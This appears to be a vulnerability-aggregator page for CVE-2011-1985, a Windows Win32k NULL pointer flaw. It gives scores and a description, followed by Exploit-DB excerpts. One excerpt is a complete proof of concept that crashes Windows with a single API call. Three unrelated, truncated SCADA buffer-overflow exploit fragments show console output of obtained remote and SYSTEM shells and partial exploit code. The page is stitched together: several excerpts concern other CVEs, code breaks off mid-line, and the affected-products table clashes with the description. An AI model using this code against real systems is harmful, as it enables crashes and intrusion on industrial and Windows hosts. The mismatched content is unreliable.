CVE-2011-1985
Published: 2011-10-12
Priority: P3 37
CVSS 3.1: 7.1 (High)
CVSS 3.1 vector: AV:L / AC:L / PR:L / UI:N / S:U / C:H / I:N / A:H
Exploit: available (see Exploit-DB entries below)
EPSS: 2.39% (81.8th percentile)
win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a crafted application, aka "Win32k Null Pointer De-reference Vulnerability."
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 7.1 | HIGH | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H |
| NVD | 2.0 | 7.2 | HIGH | AV:L/AC:L/Au:N/C:C/I:C/A:C |
No detection rules found.
Exploit-DB: CVE-2011-5007 CoDeSys SCADA 2.3 - Remote Buffer Overflow (exploitdb, 2011-12-01)
---
/*
See Also: http://aluigi.altervista.org/adv/codesys_1-adv.txt
CoDeSys v2.3 Industrial Control System Development Software
Remote Buffer Overflow Exploit for CoDeSys Scada webserver
Author : Celil UNUVER, SignalSEC Labs
www.signalsec.com
Tested on WinXP SP1 EN
THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY!
--snip--
root@bt:~# ./codesys 192.168.1.36
CoDeSys v2.3 webserver Remote Exploit
by SignalSEC Labs - www.signalsec.com
[+]Sending payload to SCADA system!
[+]Connecting to port 4444 to get shell!
192.168.1.36: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.1.36] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\3S Software\CoDeSys V
Exploit-DB: CVE-2011-1985 [HIGH] Microsoft Win32k - Null Pointer De-reference (PoC) (MS11-077) (exploitdb, 2011-10-23, CVSS 7.1)
---
# Exploit Title: MS11-077 Win32k Null Pointer De-reference Vulnerability POC
# Date: 10/19/2011
# Author: KiDebug
# Version: Windows XP SP3 32bit
# Tested on: Windows XP SP3 32bit
# CVE : CVE-2011-1985
# Exploit Code. Only a single line of code can cause BSOD:
#include <windows.h>
void main()
{
SendMessageCallback((HWND)-1,CB_ADDSTRING,0,0,0,0);
}
or:
#include <windows.h>
void main()
{
SendNotifyMessage((HWND)-1,CB_ADDSTRING,0,0);
}
Those messages can also cause BSOD:
// CB_ADDSTRING 0x0143
// CB_INSERTSTRING 0x014A
// CB_FINDSTRING 0x014C
// CB_SELECTSTRING 0x014D
// CB_FINDSTRINGEXACT 0x0158
// LB_ADDSTRING 0x0180
// LB_INSERTSTRING 0x0181
// LB_SELECTSTRING 0x018C
// LB_FINDSTRING 0x018F
// LB_FINDSTRINGEXACT 0x01A2
// LB_INSERTSTRINGU
Exploit-DB: CVE-2011-3493 Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow (exploitdb, 2011-09-22)
---
#!/usr/bin/python
#
# Cogent Datahub > @net__ninja || @luigi_auriemma
# example usage:
# [mr_me@neptune cognet]$ ./cognet_overflow.py 192.168.114.130
#
# -----------------------------------------------------
# ------ Cogent Datahub Unicode Overflow Exploit ------
# ------------- Found by Luigi Auriemma ---------------
# --------- SYSTEM exploit by Steven Seeley -----------
#
# (+) Sending overflow...
# (+) Getting shell..
# Connection to 192.168.114.130 1337 port [tcp/menandmice-dns] succeeded!
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaster>whoami
# whoami
# nt authority\system
#
# C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaste
Exploit-DB: CVE-2011-4535 ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Local Buffer Overflow (exploitdb, 2011-09-12)
---
[mr_me@neptune scadatec]$ php zip.php -t modbustagserver
[mr_me@neptune scadatec]$ nc -v 192.168.114.141 4444
Connection to 192.168.114.141 4444 port [tcp/krb524] succeeded!
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\ScadaTEC\ModbusTagServer\Projects>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'The reason they call it the American Dream is because you have to be asleep
to believe it.' ~ George Carlin
*/
if ($argc
software: target software
Example:
php ".$argv[0]." -t scadaphone
php ".$argv[0]." -t modbustagserver
"); die; }
function setArgs($argv){
$_ARG = array();
foreach ($argv as $arg){
if (ereg("--([^=]+)=(.*)", $arg, $reg)){
$_ARG[$
References
- http://www.securitytracker.com/id?1026165
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-077
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12935